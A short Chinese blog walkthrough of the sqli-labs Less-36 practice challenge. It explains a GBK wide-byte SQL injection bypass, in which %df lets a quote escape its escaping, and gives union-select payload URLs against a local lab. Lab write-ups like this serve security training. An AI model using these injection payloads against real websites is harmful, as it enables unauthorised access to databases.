sqli-labs (less-36)

其他 2021-03-22 08:50:49 阅读次数: 0

sqli-labs (less-36)

进入36关，输入id=1

http://127.0.0.1/sql1/Less-36/?id=1'

查看源代码看看这关是否使用了GBK编码

确定使用了GBK编码，使用%df让单引号成功逃逸就可以了

http://127.0.0.1/sql1/Less-36/?id=1%df'

通过错误信息判断闭合方式为’–+，并且为字符型注入

确定回显位置

http://127.0.0.1/sql1/Less-36/?id=-1%df' union select 1,2,3--+

接下来的步骤与less-32完全一样，这里我不具体介绍，具体过程请看我的less-32

猜你喜欢

转载自blog.csdn.net/kukudeshuo/article/details/114785277

sqli-Labs————less-36

sqli-labs (less-36)

sqli-labs(36)

sqli-labs ————less -10

sqli-labs ————less -16

sqli-labs ————less -7

sqli-labs ————less -9

sqli-labs ————less -8

Sqli-labs less 10

Sqli-labs less 9

Sqli-labs less 8

Sqli-labs less 7

Sqli-labs less 6

Sqli-labs less 5

#sqli-labs less 11

sqli-labs less -7

sqli-labs less 17

sqli-labs less 16

sqli-labs less 15

sqli-labs less 14

sqli-labs less 13

sqli-labs less 12

sqli-labs less 11

sqli-labs less 3

sqli-labs less 2

sqli-labs————less6

sqli-labs—————Less-4

sqli-labs—————Less-3

sqli-labs ————less -11（POST注入）

sqli-Labs————less-35

今日推荐

周排行

Leetcode简单题61~80

解决zookeeper磁盘IO高的问题

多线程相关方法详解

Maven-setting.xml文件详解

Maven 项目的 classpath 理解

渊亭科技大数据笔试题

配置JVM内存分配

计算机网络个人学习笔记（三）网络层：第三部分连载

js中两个等号(==)和三个等号(===)的区别

用C程序自动打开电脑上的程序

每日归档

更多

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)